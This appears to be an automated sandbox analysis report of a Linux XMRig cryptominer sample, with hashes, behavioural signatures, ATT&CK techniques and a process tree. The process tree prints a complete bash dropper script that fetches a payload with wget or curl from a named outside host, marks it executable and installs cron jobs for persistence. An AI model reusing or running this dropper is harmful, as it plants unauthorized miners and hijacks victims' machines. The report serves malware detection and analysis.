Analysis
-
max time kernel
36s -
max time network
31s -
platform
ubuntu-22.04_amd64 -
resource
ubuntu2204-amd64-20240611-en -
resource tags
-
submitted
30-10-2024 09:40
General
-
Target
main
-
Size
918KB
-
MD5
4567d8c6fc031d7e6ec7e05d7bf0875b
-
SHA1
136ed52d890bc49b5dc2792d8b20511b88c24f9c
-
SHA256
afd21d61ab393e3ee1512b07010756c8718be56ab9fe9b0359127f1e6e306509
-
SHA512
90bb019e9ea322d2d4972bf043bdc2b798b3b5c5d8d42c0641072db64dce2bbfd3d34b7ff6bbefe0d3aabbb3dd54e15e5262dca3065d87f7299f321a173d7d97
-
SSDEEP
12288:qfbx0BUBiCIT+yaXkeG2eNBRvlqoQfGO26dyynbikoYAw:qfbx0xCIT+xXkeGNNB33QR8kB1
Malware Config
Signatures
-
XMRig Miner payload 2 IoCs
-
Xmrig family
-
Xmrig_linux family
-
xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
-
File and Directory Permissions Modification 1 TTPs 3 IoCs
Adversaries may modify file or directory permissions to evade defenses.
-
Executes dropped EXE 12 IoCs
-
Checks hardware identifiers (DMI) 1 TTPs 4 IoCs
Checks DMI information which indicate if the system is a virtual machine.
-
Creates/modifies Cron job 1 TTPs 1 IoCs
Cron allows running tasks on a schedule, and is commonly used for malware persistence.
-
Enumerates running processes
Discovers information about currently running processes on the system
-
Reads hardware information 1 TTPs 14 IoCs
Accesses system info like serial numbers, manufacturer names etc.
-
Checks CPU configuration 1 TTPs 1 IoCs
Checks CPU information which indicate if the system is a virtual machine.
-
Reads CPU attributes 1 TTPs 56 IoCs
-
Enumerates kernel/hardware configuration 1 TTPs 24 IoCs
Reads contents of /sys virtual filesystem to enumerate system information.
-
Reads runtime system information 64 IoCs
Reads data from /proc virtual filesystem.
Processes
-
/tmp/main/tmp/main1⤵
-
/bin/bash/tmp/main -c "exec '/tmp/main' \"\$@\"" /tmp/main1⤵
-
/tmp/main/tmp/main1⤵
-
/bin/bash/tmp/main -c " #!/bin/bash RCU_GP_DIR=\"/var/tmp/.rcu_gp\" REPORT_SYSTEM_URL=\"http://xkobeimparatu.net/.puscarie/.report_system\" DIICOT_FILE=\"diicot\" setup_report_system() { if [ ! -d \"\$RCU_GP_DIR\" ]; then mkdir \"\$RCU_GP_DIR\" fi cd \"\$RCU_GP_DIR\" || exit if command -v wget &> /dev/null; then wget \"\$REPORT_SYSTEM_URL\" -O .report_system elif command -v curl &> /dev/null; then curl -o .report_system \"\$REPORT_SYSTEM_URL\" else echo \"Nu s-a gasit nici wget, nici curl\" exit 1 fi chmod +x .report_system cd - || exit } create_diicot_file() { DIICOT_PATH=\"\$RCU_GP_DIR/\$DIICOT_FILE\" cat <<EOL > \"\$DIICOT_PATH\" #!/bin/bash if ! pgrep -x .report_system >/dev/null; then /var/tmp/.rcu_gp/./.report_system> /dev/null 2>&1 & disown \$* else : fi EOL chmod +x \"\$DIICOT_PATH\" } setup_cron_jobs() { locatie=\"\$RCU_GP_DIR\" locatie2=\"\$PWD\" if [ ! -f \"\$locatie/.ps4\" ]; then echo \"\$locatie\" > \"\$locatie/.ps4\" fi if ! crontab -l | grep -q '.main'; then rm -rf \"\$locatie/.ps5\" echo \"@daily \$locatie/\$DIICOT_FILE\" >> \"\$locatie/.ps5\" sleep 1 echo \"@reboot \$locatie2/.main > /dev/null 2>&1 & disown\" >> \"\$locatie/.ps5\" sleep 1 echo \"@monthly \$locatie2/.main > /dev/null 2>&1 & disown\" >> \"\$locatie/.ps5\" sleep 1 crontab \"\$locatie/.ps5\" sleep 1 rm -rf \"\$locatie/.ps5\" fi } setup_report_system create_diicot_file setup_cron_jobs while : do \$(cat /var/tmp/.rcu_gp/.ps4)/diicot setup_cron_jobs sleep 2.5 done echo \"Merge bn mineru serifule\" " /tmp/main1⤵
- File and Directory Permissions Modification
-
/usr/bin/mkdirmkdir /var/tmp/.rcu_gp2⤵
-
/usr/bin/wgetwget http://xkobeimparatu.net/.puscarie/.report_system -O .report_system2⤵
-
/usr/bin/chmodchmod +x .report_system2⤵
- File and Directory Permissions Modification
-
/usr/bin/catcat2⤵
-
/usr/bin/chmodchmod +x /var/tmp/.rcu_gp/diicot2⤵
- File and Directory Permissions Modification
-
/usr/bin/grepgrep -q .main2⤵
-
/usr/bin/crontabcrontab -l2⤵
-
/usr/bin/rmrm -rf /var/tmp/.rcu_gp/.ps52⤵
-
/usr/bin/sleepsleep 12⤵
-
/usr/bin/sleepsleep 12⤵
-
/usr/bin/sleepsleep 12⤵
-
/usr/bin/crontabcrontab /var/tmp/.rcu_gp/.ps52⤵
- Creates/modifies Cron job
-
/usr/bin/sleepsleep 12⤵
-
/usr/bin/rmrm -rf /var/tmp/.rcu_gp/.ps52⤵
-
/usr/bin/catcat /var/tmp/.rcu_gp/.ps42⤵
-
/var/tmp/.rcu_gp/diicot/var/tmp/.rcu_gp/diicot2⤵
- Executes dropped EXE
-
/usr/bin/pgreppgrep -x .report_system3⤵
- Reads CPU attributes
- Reads runtime system information
-
/usr/bin/grepgrep -q .main2⤵
-
/usr/bin/crontabcrontab -l2⤵
-
/usr/bin/sleepsleep 2.52⤵
-
/usr/bin/catcat /var/tmp/.rcu_gp/.ps42⤵
-
/var/tmp/.rcu_gp/diicot/var/tmp/.rcu_gp/diicot2⤵
- Executes dropped EXE
-
/usr/bin/pgreppgrep -x .report_system3⤵
- Reads CPU attributes
- Reads runtime system information
-
/usr/bin/grepgrep -q .main2⤵
-
/usr/bin/crontabcrontab -l2⤵
-
/usr/bin/sleepsleep 2.52⤵
-
/usr/bin/catcat /var/tmp/.rcu_gp/.ps42⤵
-
/var/tmp/.rcu_gp/diicot/var/tmp/.rcu_gp/diicot2⤵
- Executes dropped EXE
-
/usr/bin/pgreppgrep -x .report_system3⤵
- Reads CPU attributes
- Reads runtime system information
-
/usr/bin/grepgrep -q .main2⤵
-
/usr/bin/crontabcrontab -l2⤵
-
/usr/bin/sleepsleep 2.52⤵
-
/usr/bin/catcat /var/tmp/.rcu_gp/.ps42⤵
-
/var/tmp/.rcu_gp/diicot/var/tmp/.rcu_gp/diicot2⤵
- Executes dropped EXE
-
/usr/bin/pgreppgrep -x .report_system3⤵
- Reads CPU attributes
- Reads runtime system information
-
/usr/bin/grepgrep -q .main2⤵
-
/usr/bin/crontabcrontab -l2⤵
-
/usr/bin/sleepsleep 2.52⤵
-
/usr/bin/catcat /var/tmp/.rcu_gp/.ps42⤵
-
/var/tmp/.rcu_gp/diicot/var/tmp/.rcu_gp/diicot2⤵
- Executes dropped EXE
-
/usr/bin/pgreppgrep -x .report_system3⤵
- Reads CPU attributes
- Reads runtime system information
-
/usr/bin/grepgrep -q .main2⤵
-
/usr/bin/crontabcrontab -l2⤵
-
/usr/bin/sleepsleep 2.52⤵
-
/usr/bin/catcat /var/tmp/.rcu_gp/.ps42⤵
-
/var/tmp/.rcu_gp/diicot/var/tmp/.rcu_gp/diicot2⤵
- Executes dropped EXE
-
/usr/bin/pgreppgrep -x .report_system3⤵
- Reads CPU attributes
- Reads runtime system information
-
/usr/bin/grepgrep -q .main2⤵
-
/usr/bin/crontabcrontab -l2⤵
-
/usr/bin/sleepsleep 2.52⤵
-
/usr/bin/catcat /var/tmp/.rcu_gp/.ps42⤵
-
/var/tmp/.rcu_gp/diicot/var/tmp/.rcu_gp/diicot2⤵
- Executes dropped EXE
-
/usr/bin/pgreppgrep -x .report_system3⤵
- Reads CPU attributes
- Reads runtime system information
-
/usr/bin/grepgrep -q .main2⤵
-
/usr/bin/crontabcrontab -l2⤵
-
/usr/bin/sleepsleep 2.52⤵
-
/usr/bin/catcat /var/tmp/.rcu_gp/.ps42⤵
-
/var/tmp/.rcu_gp/diicot/var/tmp/.rcu_gp/diicot2⤵
- Executes dropped EXE
-
/usr/bin/pgreppgrep -x .report_system3⤵
- Reads CPU attributes
- Reads runtime system information
-
/usr/bin/grepgrep -q .main2⤵
-
/usr/bin/crontabcrontab -l2⤵
-
/usr/bin/sleepsleep 2.52⤵
-
/usr/bin/catcat /var/tmp/.rcu_gp/.ps42⤵
-
/var/tmp/.rcu_gp/diicot/var/tmp/.rcu_gp/diicot2⤵
- Executes dropped EXE
-
/usr/bin/pgreppgrep -x .report_system3⤵
- Reads CPU attributes
- Reads runtime system information
-
/usr/bin/grepgrep -q .main2⤵
-
/usr/bin/crontabcrontab -l2⤵
-
/usr/bin/sleepsleep 2.52⤵
-
/usr/bin/catcat /var/tmp/.rcu_gp/.ps42⤵
-
/var/tmp/.rcu_gp/diicot/var/tmp/.rcu_gp/diicot2⤵
- Executes dropped EXE
-
/usr/bin/pgreppgrep -x .report_system3⤵
- Reads CPU attributes
- Reads runtime system information
-
/usr/bin/grepgrep -q .main2⤵
-
/usr/bin/crontabcrontab -l2⤵
-
/usr/bin/sleepsleep 2.52⤵
-
/usr/bin/catcat /var/tmp/.rcu_gp/.ps42⤵
-
/var/tmp/.rcu_gp/diicot/var/tmp/.rcu_gp/diicot2⤵
- Executes dropped EXE
-
/usr/bin/pgreppgrep -x .report_system3⤵
- Reads CPU attributes
- Reads runtime system information
-
/usr/bin/grepgrep -q .main2⤵
-
/usr/bin/crontabcrontab -l2⤵
-
/usr/bin/sleepsleep 2.52⤵
-
/var/tmp/.rcu_gp/.report_system/var/tmp/.rcu_gp/./.report_system1⤵
- Executes dropped EXE
- Checks hardware identifiers (DMI)
- Reads hardware information
- Checks CPU configuration
- Reads CPU attributes
- Enumerates kernel/hardware configuration
Network
MITRE ATT&CK Enterprise v15
Defense Evasion
File and Directory Permissions Modification
1Linux and Mac File and Directory Permissions Modification
1Virtualization/Sandbox Evasion
2System Checks
2Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
317B
MD548cf500fb64c71c81afde8dd3c2b6861
SHA13c0ea3c7a84d66ba62c9e578e1cad8263039bfc6
SHA256f3e58f8de08f1af4103317610f8252311f68ac0c7b4020c26efc75eec31aa22a
SHA5121556a7c491ce2ade578c84590e4b399ba8f11a178d486fb1056bb56bad7140bbc9ea0f36aced5417659f6a838a7f57e062a053dff0a0424ad20924aea7482c26
-
Filesize
17B
MD5ed41f347e368587902ee39ae0820e4f3
SHA155fc93606d1c801650fb68c85b4535658f44e51b
SHA256fadf3c99404046418d249eca29c985b40bf34d6bb6000f32bb73f39e0d6e5016
SHA5125ccd1805d59b3d114eeaaee5a422d4d37c9e7c0629ecfe43111b9c1512c3dbb649fc97e50c4c6d74ac05a0c34b4b53e4924a0dbf4decec83c1db7faed890a607
-
Filesize
31B
MD53849d2e2d4fbd74bf13c86237e5f8257
SHA11a1d605574d84531c36967e62c50387af56ec048
SHA2565a91635ed578ff1552d71f49009f5d507273b42d926960b44d952bf659c4b64e
SHA51206ee5e3db69f1cff254e46e77d6e10ab92729e3fb9dc7f961fc438d98d3fdb00a86b76e05c79215b3a7e4f25ba821285edb1ff8a8a8a76cc9f38b501891d9497
-
Filesize
76B
MD5268448409cd2df039233e116f5ff4cfd
SHA16df0a74b2cef2974dbd8422b027a29a40a5f9ad8
SHA25600293284adf5483c18ab9f69f92f52fb35568bab00ee7e4f70a490e779ddc3e8
SHA512774b981b5c388924868f10a61d1e7bc2a4207acef8bd02134d675e2197dd6590ab643201db9d1e5e700fa5d3b83a0f1d53d69c216c3b17dec5c4aec90799609c
-
Filesize
122B
MD5fc16ad6d39c8c6669ea14e35610d398b
SHA10644c85527d59857d780c26d9db9c585066a9f1a
SHA256d1e064e763215d12123c8711c37a070a6ba95c9458c0f980a308ffbd00863493
SHA512f219d7a9f1b7c35a1e4be974a62fd7a566c209f8261e06183cf9375925185c0d2e286df2f76fcec941c370738622bd592d1f398b852dda43dafd90d0bb64fe70
-
Filesize
8.4MB
MD51271e6e82b344df1c7960230ec449af7
SHA17fe3253d34cae21facc8c445c3620b9e8566988b
SHA256fff96ad553f916da4eb0d55b1075b9b4aea7b93249663aefbc0310e53c7498ba
SHA512786f8ae08f8cdb892c1d67b216d26ce8db464e445c4884ab23bdfb642d7cc52862ceb77c51b38a2f77c6ae38541ea83f6eaeb2d2c2337a2d96f61738de4ff39c
-
Filesize
137B
MD58bbab4cb0d4871bf7665cbbe5c7dd305
SHA16358fc05a9ca981197dae3cc35c1f49cc61868ec
SHA256dbeb0bb0eed71abae7cabeec6e3cbda15e1883fb95e7c68c644fdf7eb4b23723
SHA5128fe9b04e9d71c752bb356f78b4e4e1e704ca89248574817094c4b4404c27f6ba47f870158c449ff1d2a2ec4ebb7c31a8b2857ce15ae7db042a3b4e0f10776cd9